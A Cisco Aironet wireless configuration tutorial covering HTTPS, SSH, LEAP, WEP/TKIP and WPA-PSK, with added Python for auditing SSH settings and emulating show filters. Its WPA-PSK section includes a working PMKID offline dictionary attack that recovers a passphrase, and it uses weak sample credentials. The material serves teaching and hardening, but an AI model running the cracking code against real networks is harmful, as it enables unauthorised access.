tti-petitioner       4       TTI Petitioner
HTTP server current connections:
local-ipaddress:port  remote-ipaddress:port  in-bytes  out-bytes
10.0.0.1:8080         10.0.0.2:4066          5197      50720
HTTP server statistics:
Accepted connections total: 10
HTTP server history:
local-ipaddress:port  remote-ipaddress:port  in-bytes  out-bytes  end-time
10.0.0.1:80           10.0.0.2:4046          396       192        00:00:46 03/01
10.0.0.1:80           10.0.0.2:4047          427       192        00:00:52 03/01
10.0.0.1:80           10.0.0.2:4049          5352      52152      00:01:59 03/01
10.0.0.1:80           10.0.0.2:4048          4885      85094      00:02:04 03/01
10.0.0.1:80           10.0.0.2:4051          396       192        00:25:23 03/01
10.0.0.1:80           10.0.0.2:4052          4878      86257      00:26:30 03/01
10.0.0.1:80           10.0.0.2:4053          5041      50737      00:26:35 03/01
10.0.0.1:8080         10.0.0.2:4064          401       192        00:47:16 03/01
10.0.0.1:8080         10.0.0.2:4065          4343      85878      00:48:21 03/01

# sh ip http server conn
HTTP server current connections:
local-ipaddress:port  remote-ipaddress:port  in-bytes  out-bytes

ap# sh ip http server ?
  all             HTTP server all information
  connection      HTTP server connection information
  history         HTTP server history information
  secure          HTTP secure server status information
  session-module  HTTP server application session module information
  statistics      HTTP server statistics information
  status          HTTP server status information

ap# sh ip http server status
HTTP server status: Enabled
HTTP server port: 8080
HTTP server authentication method: enable
HTTP server access class: 0
HTTP server base path: flash:/c1200-k9w7-mx.123-8.JA/html/level/1;zflash:/c1200-k9w7-mx.123-8.JA/html/level/1;flash:/c1200-k9w7-mx.123-8.JA/html/level/15;zflash:/c1200-k9w7-mx.123-8.JA/html/level/15;flash:/c1200-k9w7-mx.123-8.JA/html;zflash:/c1200-k9w7-mx.123-8.JA/html;flash:
Maximum number of concurrent server connections allowed: 5
Server idle time-out: 120 seconds
Server life time-out: 120 seconds
Maximum number of requests allowed on a connection: 60
HTTP secure server capability: Present
HTTP secure server status: Disabled
HTTP secure server port: 443
HTTP secure server ciphersuite: 3des-ede-cbc-sha des-cbc-sha rc4-128-md5 rc4-128-sha
HTTP secure server client authentication: Disabled
HTTP secure server trustpoint:
Secure Web Server Explained


Outline: This challenge involves an analysis of a secure Web server.
Objectives: The objectives of this challenge are to explain the secure Web server.
Explanation
Unfortunately a plain Web server does not encrypt its data, so it is a security risk: an
intruder could read the contents of the data packets carrying the Web page from the
device to a client. An improved method is to use a secure HTTP protocol such as HTTPS.
The configuration is thus:
# config t
(config)# int bvi1
(config-if)# ip address 10.0.0.1 255.255.255.0
(config-if)# exit
(config)# ip http secure-server
% Generating 1024 bit RSA keys ...[OK]
(config)# ip http secure-port ?
  <0-65535>  Secure port number(above 1024 or default 443)
(config)# ip http secure-port 443

By default the Web page is then accessed by the client with (https://10.0.0.1), after which the
client responds with:
... graphic missed out on version see help file.
and then (the password is the default enable password):
... graphic missed out on version see help file.
and then:
... graphic missed out on version see help file.
The data transferred between the client and server will then be encrypted. To verify the
details:
ap#sh ip http server status
HTTP server status: Enabled
HTTP server port: 80
HTTP server authentication method: enable
HTTP server access class: 0
HTTP server base path: flash:/c1200-k9w7-mx.123-8.JA/html/level/1;zflash:/c1200-k9w7-mx.123-8.JA/html/level/1;flash:/c1200-k9w7-mx.123-8.JA/html/level/15;zflash:/c1200-k9w7-mx.123-8.JA/html/level/15;flash:/c1200-k9w7-mx.123-8.JA/html;zflash:/c1200-k9w7-mx.123-8.JA/html;flash:
Maximum number of concurrent server connections allowed: 5
Server idle time-out: 120 seconds
Server life time-out: 120 seconds
Maximum number of requests allowed on a connection: 60
HTTP secure server capability: Present
HTTP secure server status: Enabled
HTTP secure server port: 443
HTTP secure server ciphersuite: 3des-ede-cbc-sha des-cbc-sha rc4-128-md5 rc4-128-sha
HTTP secure server client authentication: Disabled
HTTP secure server trustpoint:
ap#sh ip http server conn
HTTP server current connections:
local-ipaddress:port  remote-ipaddress:port  in-bytes  out-bytes
10.0.0.1:443          10.0.0.2:1082          266       52587
10.0.0.1:443          10.0.0.2:1083          2493      67032
ap#sho ip http server secure status
HTTP secure server status: Enabled
HTTP secure server port: 443
HTTP secure server ciphersuite: 3des-ede-cbc-sha des-cbc-sha rc4-128-md5 rc4-128-sha
HTTP secure server client authentication: Disabled
HTTP secure server trustpoint:

User Priority Explained


Outline: This challenge involves an analysis of QoS.
Objectives: The objectives of this challenge are to explain QoS.
Explanation
The Aironet advertises its QoS parameters so that WLAN clients which require a certain
QoS level can use these advertisements to associate with the required access point. The
traffic-stream command is used to configure the radio interface for the CAC (Call
Admission Control, used in Voice over Wireless) traffic stream properties. The Aironet
supports traffic streams, configured as follows:
ap# config t
Enter configuration commands, one per line.  End with CNTL/Z.
ap(config)# int d0
ap(config-if)#traffic-stream ?
  priority  Apply to Priority
ap(config-if)# traffic-stream pri ?
  <0-7>  UP Value

where the UP (user priority) is defined as:


0 (Best Effort)
1 (Background)
2 (Spare)
3 (Excellent)
4 (Controlled Load)
5 (Video)
6 (Voice)
7 (Network Control)
ap(config-if)# traffic-stream pri 0 ?
  sta-rates  Set rates to allow for traffic-stream
ap(config-if)# traffic-stream pri 0 sta ?
  1.0       Allow 1 Mb/s rate
  11.0      Allow 11 Mb/s rate
  12.0      Allow 12 Mb/s rate
  18.0      Allow 18 Mb/s rate
  2.0       Allow 2 Mb/s rate
  24.0      Allow 24 Mb/s rate
  36.0      Allow 36 Mb/s rate
  48.0      Allow 48 Mb/s rate
  5.5       Allow 5.5 Mb/s rate
  54.0      Allow 54 Mb/s rate
  6.0       Allow 6 Mb/s rate
  9.0       Allow 9 Mb/s rate
  nom-1.0   Allow Nominal 1 Mb/s rate
  nom-11.0  Allow Nominal 11 Mb/s rate
  nom-12.0  Allow Nominal 12 Mb/s rate
  nom-18.0  Allow Nominal 18 Mb/s rate
  nom-2.0   Allow Nominal 2 Mb/s rate
  nom-24.0  Allow Nominal 24 Mb/s rate
  nom-36.0  Allow Nominal 36 Mb/s rate
  nom-48.0  Allow Nominal 48 Mb/s rate
  nom-5.5   Allow Nominal 5.5 Mb/s rate
  nom-54.0  Allow Nominal 54 Mb/s rate
  nom-6.0   Allow Nominal 6 Mb/s rate
ap(config-if)#traffic-stream pri 0 sta 1.0

Thus the best effort for this access point is a rate of 1.0Mbps. If this was advertised to client,
they would choice if this was the best rate for the best effort.

SSH Explained
Outline: This challenge involves an analysis of SSH.
Objectives: The objectives of this challenge are to explain SSH.
Explanation
The Telnet protocol is insecure, as everything in the session, including passwords, is passed as plain text. The improved method is SSH, which encrypts the session. It requires a host name, a domain name and an RSA key pair:
ap# config t
Enter configuration commands, one per line.  End with CNTL/Z.
ap(config)# ip domain-name test.com
ap(config)# crypto key generate rsa
How many bits in the modulus [512]:
% Generating 512 bit RSA keys ...[OK]

The 512-bit default offered here is far too small by current standards, and current SSH clients refuse host keys that short; give the size explicitly (for example crypto key generate rsa modulus 2048) and set ip ssh version 2 so that the obsolete SSH version 1 protocol cannot be negotiated.
To view the public key:
ap#show crypto key mypubkey rsa
% Key pair was generated at: 00:42:19 UTC Mar 1 2002
Key name: ap.test.com
Usage: General Purpose Key
Key is not exportable.
Key Data:
  305C300D 06092A86 4886F70D 01010105 00034B00 30480241 00DDD8C6 4B744520
  F1499B01 49C485A2 20C9FB37 8CD11053 039D344B 3C5BD55E E84E17C8 FD62DA08
  32020F80 910AFBCC 6D402F90 96E8A59B 40467A3E 8FEED18B B1020301 0001
% Key pair was generated at: 00:42:21 UTC Mar 1 2002
Key name: ap.test.com.server
Usage: Encryption Key
Key is not exportable.
Key Data:
  307C300D 06092A86 4886F70D 01010105 00036B00 30680261 00B435A4 C007251B
  312319CA 0E919F76 72D2D5A9 36B4710C CC4DE0C4 080D2B47 55970CA5 39F21170
  D07C0000 832F6A1C 81411423 BE52CBF4 ECBE417E 1C3C09D1 2BBC90DF 8DA398DB
  AE8EFA46 282AEC54 F0909F82 466A19DD EBEFAEDE 7B4B992F 5F020301 0001

An SSH client such as PuTTY can then be used to connect to the access point (graphic omitted in this version; see the help file), after which the client shows the unknown-host-key message (graphic omitted) and the SSH connection is made (graphic omitted). Verify the host key the client presents on that first connection out of band, for example against the key data shown above, rather than accepting it blindly; otherwise a man-in-the-middle can impersonate the access point.
To get rid of the keys:
ap(config)# crypto key zeroize rsa

and to set the timeout and authentication retries:
ap(config)# ip ssh time-out 60
ap(config)# ip ssh authentication-retries 2

which sets the SSH negotiation timeout to 60 seconds and allows a maximum of two authentication retries. Finally, to restrict the vty lines to SSH, which also prevents Telnet sessions:
ap(config)# line vty 0 4
ap(config-line)# transport input ssh
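The checks a reviewer would run against the SSH set-up above can be automated from the device's own output. The following Python is an added example, not part of this page or of the NetworkSims simulator: it parses a constructed show running-config excerpt and the show crypto key mypubkey rsa output reproduced above (the hex key data is the page's, re-joined into rows), decodes the DER SubjectPublicKeyInfo to measure each modulus, and reports vty lines that still accept Telnet, a missing ip ssh version 2 and any RSA key below 2048 bits. The threshold, the sample configuration and the wording of the findings are this example's own choices.

```python
import re

# Constructed copy of the "show crypto key mypubkey rsa" output in this challenge. The hex
# is the page's own key data, re-joined into rows; the surrounding layout is assumed.
SAMPLE_KEY_OUTPUT = """\
% Key pair was generated at: 00:42:19 UTC Mar 1 2002
Key name: ap.test.com
Usage: General Purpose Key
Key is not exportable.
Key Data:
  305C300D 06092A86 4886F70D 01010105 00034B00 30480241 00DDD8C6 4B744520
  F1499B01 49C485A2 20C9FB37 8CD11053 039D344B 3C5BD55E E84E17C8 FD62DA08
  32020F80 910AFBCC 6D402F90 96E8A59B 40467A3E 8FEED18B B1020301 0001
% Key pair was generated at: 00:42:21 UTC Mar 1 2002
Key name: ap.test.com.server
Usage: Encryption Key
Key is not exportable.
Key Data:
  307C300D 06092A86 4886F70D 01010105 00036B00 30680261 00B435A4 C007251B
  312319CA 0E919F76 72D2D5A9 36B4710C CC4DE0C4 080D2B47 55970CA5 39F21170
  D07C0000 832F6A1C 81411423 BE52CBF4 ECBE417E 1C3C09D1 2BBC90DF 8DA398DB
  AE8EFA46 282AEC54 F0909F82 466A19DD EBEFAEDE 7B4B992F 5F020301 0001
"""

# Constructed "show running-config" excerpt modelled on the commands in this challenge.
SAMPLE_CONFIG = """\
hostname ap
ip domain-name test.com
ip ssh time-out 60
ip ssh authentication-retries 2
line vty 0 4
 transport input ssh
line vty 5 15
 transport input telnet ssh
"""

HEX_ROW = re.compile(r"^\s*(?:[0-9A-Fa-f]{2,8}\s*)+$")


def _der_tlv(buf, pos):
    """Decode one DER tag and length at buf[pos]; return (tag, value_start, value_end)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: the low 7 bits say how many length bytes follow
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    return tag, pos, pos + length


def rsa_modulus_bits(key_data_hex):
    """Modulus size of the DER SubjectPublicKeyInfo that IOS prints under 'Key Data:'."""
    der = bytes.fromhex("".join(key_data_hex.split()))
    tag, spki_start, _ = _der_tlv(der, 0)            # SubjectPublicKeyInfo ::= SEQUENCE
    if tag != 0x30:
        raise ValueError("key data is not a DER SEQUENCE")
    _, _, alg_end = _der_tlv(der, spki_start)        # AlgorithmIdentifier (rsaEncryption, NULL)
    _, bits_start, _ = _der_tlv(der, alg_end)        # subjectPublicKey BIT STRING
    _, rsa_start, _ = _der_tlv(der, bits_start + 1)  # skip unused-bits byte: RSAPublicKey SEQUENCE
    _, n_start, n_end = _der_tlv(der, rsa_start)     # modulus INTEGER (may carry a leading 0x00)
    return int.from_bytes(der[n_start:n_end], "big").bit_length()


def key_sizes(show_output):
    """Map each 'Key name:' in show crypto key mypubkey rsa output to its modulus size in bits."""
    sizes, name, rows, in_data = {}, None, [], False
    for line in show_output.splitlines() + ["Key name: <end>"]:  # sentinel flushes the last key
        if line.startswith("Key name:"):
            if name and rows:
                sizes[name] = rsa_modulus_bits(" ".join(rows))
            name, rows, in_data = line.split(":", 1)[1].strip(), [], False
        elif line.startswith("Key Data:"):
            in_data = True
        elif in_data and HEX_ROW.match(line):
            rows.append(line)
        else:
            in_data = False
    return sizes


def audit_config(config_text, key_output, min_modulus_bits=2048):
    """Findings a reviewer would raise against the SSH set-up shown in this challenge."""
    findings, transports, block = [], {}, None
    for raw in config_text.splitlines():
        line = raw.strip()
        if line.startswith("line "):
            block = line
            transports[block] = None
        elif block and line.startswith("transport input"):
            transports[block] = line.split()[2:]
    for block, allowed in transports.items():
        if not block.startswith("line vty"):
            continue
        if allowed is None:
            findings.append(f"{block}: no 'transport input', so the platform default applies")
        elif allowed != ["ssh"]:
            findings.append(f"{block}: transport input {' '.join(allowed)} still accepts cleartext telnet")
    if "ip ssh version 2" not in config_text:
        findings.append("'ip ssh version 2' not set: SSH version 1 may be negotiated")
    for key_name, bits in key_sizes(key_output).items():
        if bits < min_modulus_bits:
            findings.append(f"RSA key {key_name} is {bits} bits; regenerate with at least {min_modulus_bits}")
    return findings
```

Run audit_config(SAMPLE_CONFIG, SAMPLE_KEY_OUTPUT) to list the findings; on the page's data it flags the second vty range, the missing SSH version pin and both key pairs (512 and 768 bits). Feed it the output of the real commands to audit a live device.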

LEAP Explained
Outline: This challenge involves an analysis of LEAP.
Objectives: The objectives of this challenge are to explain LEAP.
Explanation
The following uses the access point's local RADIUS server to authenticate clients with LEAP:
(config)# hostname ap
(config)# aaa new-model
(config)# int bvi1
(config-if)# ip address 192.168.1.110 255.255.255.0
(config-if)# exit
(config)# dot11 ssid APskills
(config-ssid)# authentication network-eap eap_methods
(config-ssid)# guest-mode
(config-ssid)# exit
(config)# radius-server local
(config-radsrv)# nas 192.168.1.110 key sharedkey
(config-radsrv)# user aaauser password aaauser
(config-radsrv)# exit
(config)# radius-server host 192.168.1.110 auth-port 1812 acct-port 1813 key sharedkey
(config)# interface d0
(config-if)# channel 11
(config-if)# station-role root
(config-if)# encryption key 1 size 40bit aaaaaaaaaa transmit-key
(config-if)# encryption mode ciphers tkip wep40
(config-if)# ssid APskills

In this case the LEAP user login is aaauser with a password of aaauser. Notice that the NAS is set to the local IP address, and that the RADIUS server is also set to the local IP address, because the access point is acting as both the authenticator and the authentication server. The name eap_methods is an AAA login list, which must also be defined (aaa authentication login eap_methods group radius) for the SSID to reach the server.
Notice also that the shared key (in this case sharedkey) must be the same for the NAS and the RADIUS server.
LEAP itself should be treated as a legacy method: its MS-CHAP-style challenge/response can be captured over the air and subjected to an offline dictionary attack on the user's password, so it is only as strong as the weakest password in use, and Cisco has long recommended migrating to EAP-FAST or another tunnelled EAP method. The 40-bit WEP group key configured here is likewise only for compatibility with old clients.
Next set up the clients to support LEAP authentication, as shown in Figure 1. Once a client has associated, list the associated devices with:
# show dot11 associations
802.11 Client Stations on Dot11Radio0:
SSID [APskills] :
MAC Address     IP address     Device      Name  Parent  State
0090.4b54.d83a  192.168.1.111  4500-radio  -     self    EAP-Assoc
Others: (not related to any ssid)

Figure 1: LEAP setup (graphic omitted in this version; see the help file)

After which the access point will display a message such as the following on a successful association:
*Mar 1 00:00:51.750: %DOT11-6-ASSOC: Interface Dot11Radio0, Station 0090.4b54.d83a Associated KEY_MGMT[WPA]

D0 Encapsulation
Outline: This challenge involves setting up the encapsulation on D0.
Objectives: The objectives of this challenge are to outline encapsulation on D0.
Explanation
The following sets up SNAP encapsulation on D0:
(config)# hostname ap
(config)# aaa new-model
(config)# int bvi1
(config-if)# ip address 192.168.1.110 255.255.255.0
(config-if)# exit
(config)# dot11 ssid APskills
(config-ssid)# authentication open
(config-ssid)# exit
(config)# interface d0
(config-if)# channel 11
(config-if)# encapsulation snap
(config-if)# ssid APskills

Note that this SSID uses open authentication with no encryption, so it is suitable only for testing or for a deliberately public network.

Command Filtering Explained


Outline: This challenge involves filtering the output of the show command.
Objectives: The objectives of this challenge are to outline the usage of the filtering of the output in the show command.
Explanation
The output filters are:
show command | include regex    prints only the lines that match regex
show command | exclude regex    prints only the lines that do not match regex
show command | begin regex      prints from the first line that matches regex to the end of the output
The argument is a regular expression rather than a plain word, so characters such as ., * and [ are special and must be escaped with a backslash to be matched literally. An example is:
# show running | include udp
# show running | include tcp
# show running | include !
# show running | begin version
# show running | exclude int

Command Filtering Explained


NetworkSims.com

415

Outline: This challenge involves filtering the output of the show command.
Objectives: The objectives of this challenge are to outline the usage of the filtering of the output in the show command.
Explanation
The include, exclude and begin filters work as described in the previous challenge. An example using show version is:
# show version | include cisco
# show version | include product
# show version | include ver
# show version | begin power
# show version | exclude pca
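As an added example (not from the page), the three filters above implemented in Python over a constructed show running-config excerpt, so the difference between include and begin is visible: begin does not select lines that start with the pattern, it starts the output at the first match and keeps everything after it. The function and sample names are this example's own.

```python
import re

# Constructed "show running-config" excerpt used as input (not captured from a device).
SAMPLE_OUTPUT = """\
version 12.3
hostname ap
!
interface Dot11Radio0
 ssid APskills
!
interface BVI1
 ip address 192.168.1.110 255.255.255.0
!
line vty 0 4
 transport input ssh
!
end"""


def filter_output(text, operator, pattern):
    """Emulate IOS 'show ... | include|exclude|begin <regex>' over captured output.

    The pattern is a regular expression, as on IOS; use re.escape() for literal text.
    """
    regex = re.compile(pattern)
    lines = text.splitlines()
    if operator == "include":
        return [line for line in lines if regex.search(line)]
    if operator == "exclude":
        return [line for line in lines if not regex.search(line)]
    if operator == "begin":
        # Output starts at the first matching line and runs to the end, matching or not.
        for index, line in enumerate(lines):
            if regex.search(line):
                return lines[index:]
        return []
    raise ValueError(f"unknown filter operator: {operator!r}")


if __name__ == "__main__":
    for op, pat in (("include", "^interface"), ("exclude", re.escape("!")), ("begin", "line vty")):
        print(f"| {op} {pat}")
        print("\n".join(filter_output(SAMPLE_OUTPUT, op, pat)))
```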

Public Secure Packet Forwarding (PSPF) Explained
Outline: This challenge involves enabling PSPF.
Objectives: The objectives of this challenge are to outline the usage of PSPF.
Explanation
Public Secure Packet Forwarding (PSPF) prevents wireless clients associated to an access point from communicating with each other through it. Clients can still reach the Internet, but they are isolated from one another instead of sharing a local network. This is often used on public wireless networks, such as on university campuses, where one client must not be able to probe or attack another. Note that PSPF only blocks traffic the access point itself would relay: clients on different access points can still reach each other across the wired network unless the switch ports are also configured as protected ports.
An example is:
# config t
(config)# int d0
(config-if)# bridge-group 1 ?
  circuit-group              Associate serial interface with a circuit group
  input-address-list         Filter packets by source address
  input-lat-service-deny     Deny input LAT service advertisements matching a group list
  input-lat-service-permit   Permit input LAT service advertisements matching a group list
  input-lsap-list            Filter incoming IEEE 802.3 encapsulated packets
  input-type-list            Filter incoming Ethernet packets by type code
  lat-compression            Enable LAT compression over serial or ATM interfaces
  output-address-list        Filter packets by destination address
  output-lat-service-deny    Deny output LAT service advertisements matching a group list
  output-lat-service-permit  Permit output LAT service advertisements matching a group list
  output-lsap-list           Filter outgoing IEEE 802.3 encapsulated packets
  output-type-list           Filter outgoing Ethernet packets by type code
  port-protected             There will be no traffic between this interface and other protected port interface in this bridge group
  subscriber-loop-control    Configure subscriber loop control
  block-unknown-source       block traffic which come from unknown source MAC address
  input-pattern-list         Filter input with a pattern list
  output-pattern-list        Filter output with a pattern list
  path-cost                  Set interface path cost
  priority                   Set interface priority
  source-learning            learn source MAC address
  spanning-disabled          Disable spanning tree on a bridge group
  unicast-flooding           flood packets with unknown unicast destination MAC addresses
  <cr>

(config-if)# bridge-group 1 port-protected

Multiple Basic SSIDs (MBSSID) Explained


Outline: This challenge involves setting up MBSSID.
Objectives: The objectives of this challenge are to outline the usage of MBSSID.
Explanation
Up to eight basic SSIDs (BSSIDs) can be assigned to a radio; each BSSID is a distinct MAC address. With multiple BSSIDs (MBSSID) the access point can give each SSID its own DTIM period and advertise more than one SSID in its beacons. Using MBSSID in guest mode makes the guest SSID visible to clients that scan for networks.
An example is:
# config t
(config)# dot11 ssid fred
(config-ssid)# mbssid guest-mode dtim 10
(config-ssid)# exit
(config)# int d0
(config-if)# mbssid

Note:
Large DTIM values are useful for increasing the battery life of power-save client devices, at the cost of delaying broadcast and multicast delivery to them.

Cisco Wireless Challenge 64 (Test)


Outline
This is an intermediate test, which revises some of the main principles of Wireless
configuration.

Cisco Wireless Challenge 65 (Test)


Outline
This is an intermediate test, which revises some of the main principles of Wireless
configuration.

SSID Redirection Explained


Outline: This challenge involves defining SSID redirection.
Objectives: The objectives of this challenge are to outline the usage of SSID redirection.
Explanation
With IP redirection on an SSID, all packets from clients are sent to a specific IP address. This is typically used with handheld devices, where specific software on a server handles the data packets. For example, handheld scanners might connect to an SSID named HANDHELDS; with redirection on this SSID, all their data packets are sent to the specified IP address, where the software is set up to handle them. It is also possible to redirect only specific types of traffic, but this requires an ACL.

An example is:
# config t
(config)# dot11 ssid fred
(config-ssid)# ip ?
  redirection  Redirect client data to alternate IP address
(config-ssid)# ip redirection ?
  host  Destination host to forward data
(config-ssid)# ip redirection host ?
  A.B.C.D  IP redirect destination host address
(config-ssid)# ip redirection host 192.168.1.1
(config-ssid)# exit

SSID Redirection with ACL Explained


Outline: This challenge involves defining SSID redirection with ACLs.
Objectives: The objectives of this challenge are to outline the usage of SSID redirection with ACLs.
Explanation
With IP redirection on an SSID, all packets from clients are sent to a specific IP address, as in the previous challenge. To redirect only specific types of traffic, apply an ACL that defines the traffic to be redirected. Note: all other traffic that is not matched by the ACL will be dropped, so check the ACL carefully before rolling it out.
An example is:
# config t
(config)# access-list 1 permit 10.0.0.0 0.0.0.255
(config)# dot11 ssid fred
(config-ssid)# ip ?
  redirection  Redirect client data to alternate IP address
(config-ssid)# ip redirection ?
  host  Destination host to forward data
(config-ssid)# ip redirection host ?
  A.B.C.D  IP redirect destination host address
(config-ssid)# ip red host 1.2.3.4 ?
  access-group  Optional group access-list to apply
  <cr>
(config-ssid)# ip red host 1.2.3.4 access-group ?
  WORD  Access-list number or name
(config-ssid)# ip red host 1.2.3.4 access-group 1 ?
  in  Apply to input interface
(config-ssid)# ip red host 1.2.3.4 access-group 1 in ?
  <cr>
(config-ssid)# ip red host 1.2.3.4 access-group 1 in
(config-ssid)# exit

SSID in an SSIDL IE Explained


Outline: This challenge involves using an SSID in an SSIDL IE (information element).
Objectives: The objectives of this challenge are to outline the usage of an SSID in an SSIDL IE.
Explanation
Only one broadcast SSID is carried in the SSID field of a beacon. An SSIDL information element (SSIDL IE) included in the beacon can carry additional SSIDs, so clients can detect the other SSIDs along with the security settings for each. Advertising or hiding an SSID is not a security control either way: every SSID is visible in probe and association frames to anyone listening.
An example is:
# config t
(config)# dot11 ssid fred
(config-ssid)# information-element ssidl ?
  advertisement  include SSID name in SSIDL IE
  wps            advertise WPS capability in SSID IE
  <cr>
(config-ssid)# information-element ssidl advertisement
(config-ssid)# exit

VLAN Encryption Explained


Outline: This challenge involves using an encryption key for a VLAN.
Objectives: The objectives of this challenge are to use an encryption key for a VLAN.
Explanation
A WEP encryption key can be set for each VLAN, so that traffic on that VLAN is encrypted over the air. Up to four keys (slots 1 to 4) can be defined per VLAN.
An example is:
# config t
(config)# dot11 ssid fred
(config-ssid)# vlan 22
(config-ssid)# exit
(config)# int d0
(config-if)# encryption vlan 22 key 1 size 40bit aaaaaaaaaa

which defines a 40-bit encryption key of aaaaaaaaaa (a value of 10 hexadecimal digits). The other option is a 128-bit key, which is entered as 26 hexadecimal digits. In this case the SSID fred is assigned to VLAN 22, so all the nodes in this VLAN share the key and receive each other's broadcasts. Note that static WEP of either size is broken and the key can be recovered from captured traffic in minutes; use it only where legacy clients leave no alternative, and prefer the WPA cipher modes of the next challenge.

VLAN Encryption Mode Explained
Outline: This challenge involves using an encryption mode for a VLAN.
Objectives: The objectives of this challenge are to use an encryption mode for a VLAN.
Explanation
An encryption mode (cipher suite) can be set for each VLAN, so that traffic on that VLAN is encrypted over the air. Most hosts now use WPA, which allows TKIP encryption. WEP suffers from many security problems; TKIP was designed to overcome most of them while staying compatible with the IEEE 802.11 hardware of the time, but it has since been broken in turn and is deprecated: where clients support it, AES-CCMP (WPA2, encryption mode ciphers aes-ccm on later Aironet releases) should be used instead. CKIP and CMIC are Cisco-proprietary methods and sometimes lack compatibility with non-Cisco clients. An example for WPA using TKIP is:
# config t
(config)# dot11 ssid fred
(config-ssid)# vlan 22
(config-ssid)# exit
(config)# int d0
(config-if)# ssid fred
(config-if)# encryption vlan 22 mode ciphers tkip

The two main cipher suites for authenticated key management are:

CCKM (Cisco Centralized Key Management), which can use:
  wep128
  wep40
  ckip
  cmic
  ckip-cmic
  tkip

WPA, which can use:
  tkip
  tkip wep128
  tkip wep40

VLAN Broadcast-key Explained


Outline: This challenge involves defining the change time for the broadcast key.
Objectives: The objectives of this challenge are to change the time for the broadcast key.
Explanation
Broadcast key rotation makes the access point generate a new broadcast (group) key at a fixed interval and deliver it to the associated clients. It is disabled by default, and it requires 802.1X-based authentication (such as LEAP, EAP-TLS or PEAP), because each client receives the new key protected by the session key it established during authentication. Rotating the key limits how much traffic an attacker can collect under any one key. The change time is defined with:
# config t
(config)# dot11 ssid fred
(config-ssid)# vlan 22
(config-ssid)# exit
(config)# int d0
(config-if)# ssid fred
(config-if)# broadcast-key vlan 22 change 100

which enables broadcast key rotation on VLAN 22 and changes the broadcast key every 100 seconds.

Authentication based on MAC-address Explained

Outline: This challenge involves defining authentication based on MAC addresses.

Explanation
With MAC-address authentication the access point sends the client's MAC address to a RADIUS server as the username and password, and only admits the client to the SSID if the server accepts it. Because MAC addresses are sent in the clear in every frame and can be changed on any client, this is an access-control convenience rather than a security control: an attacker who observes an authorised client's address can simply spoof it. Use it alongside EAP or WPA encryption, not instead of them.
# config t
(config)# dot11 ssid fred
(config-ssid)# authentication open mac-address maclist
(config-ssid)# exit
(config)# aaa new-model
(config)# aaa authentication login maclist group radius

Here maclist is the name of the AAA login list used for MAC authentication, which is mapped to the RADIUS server group.


WPA-PSK Explained
Outline: This challenge involves defining the pre-shared key for WPA-PSK.
Explanation
Unfortunately, WEP suffers from many problems and should not be used for sensitive data. An improvement which keeps compatibility with WEP-era hardware is TKIP. One way to use it is WPA-PSK (pre-shared key), where the user defines a pre-shared key that is configured on both the access point and the client. The passphrase is the only secret: anyone who captures a client's association can test candidate passphrases offline, so it must be long and random. On the Aironet the SSID also needs authentication key-management wpa and the radio interface an encryption mode (for example encryption mode ciphers tkip), otherwise the key is never used. An example setup of WPA-PSK on a Linksys access point (Figure 1) and on a client (Figure 2) is shown, both with the same shared key napieruniversity.
> enable
# config t
(config)# dot11 ssid texas
(config-ssid)# wpa-psk ascii napieruniversity
(config-ssid)# exit
(config)# int d0
(config-if)# ssid texas

Figure 1: WPA-PSK (Linksys configuration) (diagram not included in this version)
Figure 2: WPA-PSK (client) (diagram not included in this version)
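To show why the strength of the passphrase is the whole security of WPA-PSK, here is an added Python example (not from the page): it derives the pairwise master key exactly as 802.11 specifies (PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 rounds, 256 bits), computes the RSN PMKID that an attacker can read from the first message of a WPA2 association, and runs a small constructed word list against it. The SSID texas and the passphrase napieruniversity are the page's; the AP MAC address, the strong comparison passphrase and the word list are constructed for this example, and the client MAC is the one from the LEAP challenge's show output.

```python
import hashlib
import hmac


def derive_pmk(passphrase, ssid):
    """WPA/WPA2-Personal pairwise master key: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk, ap_mac, sta_mac):
    """RSN PMKID: first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AA || SPA)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def recover_passphrase(captured_pmkid, ssid, ap_mac, sta_mac, wordlist):
    """Offline dictionary attack: one PBKDF2 run per candidate, no further traffic needed."""
    for candidate in wordlist:
        if pmkid(derive_pmk(candidate, ssid), ap_mac, sta_mac) == captured_pmkid:
            return candidate
    return None


# Constructed sample: SSID and passphrase are the page's; AP MAC and word list are made up for
# this example; the client MAC is the one from the LEAP challenge's show dot11 associations.
SSID = "texas"
AP_MAC = bytes.fromhex("0012d9aabbcc")
STA_MAC = bytes.fromhex("00904b54d83a")
WORDLIST = ["password", "napier", "edinburgh", "napieruniversity", "correcthorse"]


def demo():
    """Return (passphrase recovered for the page's key, result for a random passphrase)."""
    weak = pmkid(derive_pmk("napieruniversity", SSID), AP_MAC, STA_MAC)
    strong = pmkid(derive_pmk("jR7#vQ2m!pL9xW4z", SSID), AP_MAC, STA_MAC)
    return (recover_passphrase(weak, SSID, AP_MAC, STA_MAC, WORDLIST),
            recover_passphrase(strong, SSID, AP_MAC, STA_MAC, WORDLIST))


if __name__ == "__main__":
    print(demo())
```

The page's passphrase falls to a five-word list; the random one does not. Real tools check candidates against the 4-way handshake MIC instead of the PMKID when no PMKID is offered, but the cost per guess is the same 4096 HMAC rounds, and hardware runs millions of them per second.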

Authentication Holdtimes Explained


Outline: This challenge involves defining the timeouts for authentication.
Explanation
An example is
> enable
# config t
(config)# dot11 holdoff-time 15
(config)# dot1x timeout supp-response 10
(config)# int d0
(config-if)# dot1x reauth-period 10
(config-if)# countermeasure tkip hold-time

where:

(config)# dot11 holdoff-time x

This is the time, in seconds, that a client device must wait before it can reattempt authentication after failing. A client is held off when it fails three logins or does not reply to three authentication requests. Range: 1-65,545 seconds.

(config)# dot1x timeout supp-response 10

This is the time, in seconds, that the access point waits for a reply to an EAP/dot1x message from a client before the authentication is failed.

(config-if)# dot1x reauth-period 10

This is the time, in seconds, after which the access point asks the client to reauthenticate itself. Ten seconds, as in the example, is only sensible for testing; in production it would generate constant authentication traffic.

(config-if)# countermeasure tkip hold-time

